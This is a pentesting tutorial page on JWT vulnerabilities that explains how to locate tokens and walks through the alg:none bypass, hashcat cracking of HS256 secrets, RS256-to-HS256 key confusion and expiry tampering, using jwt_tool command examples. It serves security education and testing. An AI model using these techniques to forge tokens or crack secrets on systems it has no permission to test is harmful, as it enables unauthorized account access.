# JWT Vulnerabilities

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## What is JWT?

JWT is an open standard (RFC 7519) for securely transmitting information between parties as a JSON object. It consists of three parts:

* **Header** – Specifies the token type and signing algorithm (e.g., HS256, RS256).
* **Payload** – Contains the claims, such as user ID, roles, and expiration time.
* **Signature** – Used to verify the authenticity of the token.

A typical JWT looks like this:

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikpv
biBEb2UiLCJhZG1pbiI6dHJ1ZX0.
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
```

JWTs are widely used in APIs, Single Sign-On (SSO), and authentication mechanisms, but their security largely depends on correct implementation.

<figure><img src="https://1165982130-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F2Et8P5OeWSCJodZ98ujw%2Fuploads%2Fsp6cxGaHKU5c7KmAczqi%2Fimage.png?alt=media&#x26;token=749967b8-8588-427a-b813-ded63bc86ff5" alt=""><figcaption></figcaption></figure>

***

## Find JWT tokens

#### 1. **Inspect HTTP Headers**

JWTs are often passed in HTTP headers, particularly in the `Authorization` header:

```
Authorization: Bearer <your_jwt_token>
```

Use tools like Burp Suite, Postman, or your browser’s Developer Tools to inspect network requests and locate JWTs.

#### 2. **Check Local Storage, Session Storage, and Cookies**

JWTs may be stored in:

```
console.log(localStorage.getItem('token'));
console.log(sessionStorage.getItem('token'));
console.log(document.cookie);
```

Use browser Developer Tools (`F12` -> `Application` -> `Storage`) to find them.

#### 3. **Search in JavaScript Files**

Developers sometimes hardcode JWTs in JavaScript files. Use tools like `grep`:

```
grep -r 'eyJ' /var/www/html/
```

Or use Burp Suite’s passive scanner to detect tokens.

#### 4. **Analyze API Responses**

JWTs are often returned in API responses. Use tools like `curl`:

```
curl -X GET https://example.com/api -H "Authorization: Bearer <token>"
```

Intercept API responses with Burp Suite or OWASP ZAP to extract JWTs.

#### 5. **Check Logs and Error Messages**

JWTs may be leaked in logs or error messages. Run:

```
grep -r 'Authorization: Bearer' /var/log/
```

Review logs, especially if debugging mode is enabled.

#### 6. **Use Search Engines (Google Dorking)**

Sometimes JWTs are exposed online. Try:

```
site:example.com inurl:token
```

***

## Quick win

Run [**jwt\_tool**](https://github.com/ticarpi/jwt_tool) with mode `All Tests!` and wait for green lines

```bash
python3 jwt_tool.py -M at \
    -t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
    -rh "Authorization: Bearer eyJhbG...<JWT Token>"
```

If you are lucky the tool will find some case where the web application is incorrectly checking the JWT:

![](https://book.hacktricks.wiki/en/images/image%20\(935\).png)

Then, you can search the request in your proxy or dump the used JWT for that request using jwt\_ tool:

```bash
python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"
```

You can also use the [**Burp Extension SignSaboteur**](https://github.com/d0ge/sign-saboteur) to launch JWT attacks from Burp.

***

### Common JWT Vulnerabilities and Exploitation Techniques

### 1. **Algorithm Confusion Attack (None Algorithm Bypass)**

If a server improperly verifies the signing algorithm, an attacker can modify the header to use `"alg": "none"`, bypassing signature verification.

**Exploitation:**

1. Capture a valid JWT token.
2. Modify the header to:

   ```
   { "alg": "none", "typ": "JWT" }
   ```
3. Remove the signature part and send the modified token to the server.
4. If the server accepts the unsigned token, authentication is bypassed.

***

### 2. **Weak Secret Key (Brute-Force HS256 Secret Key)**

HS256 requires a secret key for signing, but weak secrets can be brute-forced using tools like `jwt-cracker` or `John the Ripper`.

**Exploitation:**

1. Extract the JWT token.
2. Use `jwt-tool` or `hashcat` to brute-force the key:

   ```
   hashcat -m 16500 -a 3 token.jwt rockyou.txt
   ```
3. If cracked, forge valid JWT tokens with arbitrary claims.

***

### 3. **Key Confusion in RS256 to HS256 Downgrade Attack**

If a server allows switching between `RS256` and `HS256`, an attacker can trick it into using a public key as an HMAC secret key.

**Exploitation:**

1. Extract the public key of the application.
2. Change the algorithm in the JWT header from `RS256` to `HS256`.
3. Sign the token using the extracted public key.
4. If accepted, the attacker can generate valid admin JWTs.

***

### 4. **JWT Expiration and Replay Attacks**

Expired tokens may still be accepted if expiration checks are not properly implemented.

**Exploitation:**

1. Capture a valid JWT.
2. Modify the `exp` field in the payload to extend its validity.
3. Resign the token and reuse it to gain prolonged access.

***

### 5. **Sensitive Data Exposure in JWT Payloads**

JWT payloads are base64-encoded, not encrypted. Storing sensitive data in them can lead to information leaks.

**Exploitation:**

1. Decode the JWT payload:

   ```
   echo '<JWT_PAYLOAD>' | base64 -d
   ```
2. If sensitive information (passwords, API keys) is exposed, attackers can use it for further attacks.

***

## Tools for Penetration Testing JWTs

### **1. jwt\_tool**

* A powerful Python tool for testing JWT security.
* Install it using:

  ```
  pip install jwt_tool
  ```
* Example usage:

  ```
  jwt_tool <token> -C -d wordlist.txt
  ```

### **2. jwt-cracker**

* Used for brute-forcing weak JWT secrets.
* Command:

  ```
  jwt-cracker -t <token>
  ```

### **3. Burp Suite with JWT Editor**

* Intercept and modify JWTs in real time.
* Add `JWT Editor` extension from Burp’s BApp Store.

### **4. John the Ripper & Hashcat**

* Used for cracking JWT HMAC secrets.
* Hashcat example:

  ```
  hashcat -m 16500 -a 3 <token> rockyou.txt
  ```

***

{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}